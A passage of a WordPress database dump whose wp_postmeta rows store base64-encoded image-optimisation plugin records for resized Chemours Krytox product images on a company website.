XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1Hcm91cC1PaWwtU2NhbGUtMzAwLWRwaS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjkyMiwiaWQiOjM4NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtT2lsLVNjYWxlLTMwMC1kcGktNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtT2lsLVNjYWxlLTMwMC1kcGktNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtT2lsLVNjYWxlLTMwMC1kcGktNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY5MjQsImlkIjozODR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtT2lsLVNjYWxlLTMwMC1kcGktMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtT2lsLVNjYWxlLTMwMC1kcGktMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtT2lsLVNjYWxlLTMwMC1kcGktMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY5MjYsImlkIjozODR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtT2lsLVNjYWxlLTMwMC1kcGktMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtT2lsLVNjYWxlLTMwMC1kcGktMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtT2lsLVNjYWxlLTMwMC1kcGktMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY5MjksImlkIjozODR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtT2lsLVNjYWxlLTMwMC1kcGktMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtT2lsLVNjYWxlLTMwMC1kcGktMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtT2lsLVNjYWxlLTMwMC1kcGktMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY5MzEsImlkIjozODR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtT2lsLVNjYWxlLTMwMC1kcGktMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtT2lsLVNjYWxlLTMwMC1kcGktMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtT2lsLVNjYWxlLTMwMC1kcGktMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY5MzMsImlkIjozODR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtT2lsLVNjYWxlLTMwMC1kcGktNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtT2lsLVNjYWxlLTMwMC1kcGktNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtT2lsLVNjYWxlLTMwMC1kcGktNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY5MzUsImlkIjozODR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtT2lsLVNjYWxlLTMwMC1kcGktNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtT2lsLVNjYWxlLTMwMC1kcGktNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtT2lsLVNjYWxlLTMwMC1kcGktNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY5MzgsImlkIjozODR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30211, 383, 'wpfc_optimisation_reduction', '506532'); 
INSERT INTO `wp_postmeta` VALUES (30212, 383, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyb3VwLUdyZWFzZS1TY2FsZS0zMDAtZHBpLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyb3VwLUdyZWFzZS1TY2FsZS0zMDAtZHBpLmpwZyIsIndpZHRoIjoxNTAwLCJoZWlnaHQiOjE1MDAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGkuanBnIiwicmVkdWN0aW9uIjo1MDY1MTksInRpbWUiOjE0ODM1ODY5NDcsImlkIjoiMzgzIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY5NTAsImlkIjozODN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyb3VwLUdyZWFzZS1TY2FsZS0zMDAtZHBpLTgwMHg4MDAuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo4MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyb3VwLUdyZWFzZS1TY2FsZS0zMDAtZHBpLTgwMHg4MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyb3VwLUdyZWFzZS1TY2FsZS0zMDAtZHBpLTgwMHg4MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2OTUzLCJpZCI6MzgzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1Hcm91cC1HcmVhc2UtU2NhbGUtMzAwLWRwaS03Njh4NzY4LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NzY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1Hcm91cC1HcmVhc2UtU2NhbGUtMzAwLWRwaS03Njh4NzY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1Hcm91cC1HcmVhc2UtU2NhbGUtMzAwLWRwaS03Njh4NzY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4Njk1NSwiaWQiOjM4M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY5NTcsImlkIjozODN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyb3VwLUdyZWFzZS1TY2FsZS0zMDAtZHBpLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyb3VwLUdyZWFzZS1TY2FsZS0zMDAtZHBpLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyb3VwLUdyZWFzZS1TY2FsZS0zMDAtZHBpLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2OTYwLCJpZCI6MzgzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1Hcm91cC1HcmVhc2UtU2NhbGUtMzAwLWRwaS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1Hcm91cC1HcmVhc2UtU2NhbGUtMzAwLWRwaS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1Hcm91cC1HcmVhc2UtU2NhbGUtMzAwLWRwaS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4Njk2MiwiaWQiOjM4M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY5NjUsImlkIjozODN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY5NjcsImlkIjozODN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY5NjksImlkIjozODN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY5NzEsImlkIjozODN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY5NzMsImlkIjozODN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY5NzYsImlkIjozODN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtR3JlYXNlLVNjYWxlLTMwMC1kcGktNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY5NzgsImlkIjozODN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30213, 382, 'wpfc_optimisation_reduction', '1147549'); 
INSERT INTO `wp_postmeta` VALUES (30214, 382, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyb3VwLUNvbWJvLVNjYWxlLTMwMC1kcGkuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtQ29tYm8tU2NhbGUtMzAwLWRwaS5qcGciLCJ3aWR0aCI6MzYwMCwiaGVpZ2h0IjoxNTAwLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyb3VwLUNvbWJvLVNjYWxlLTMwMC1kcGkuanBnIiwicmVkdWN0aW9uIjoxMTQ3NTM1LCJ0aW1lIjoxNDgzNTg2OTg5LCJpZCI6IjM4MiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyb3VwLUNvbWJvLVNjYWxlLTMwMC1kcGktMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JvdXAtQ29tYm8tU2NhbGUtMzAwLWRwaS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC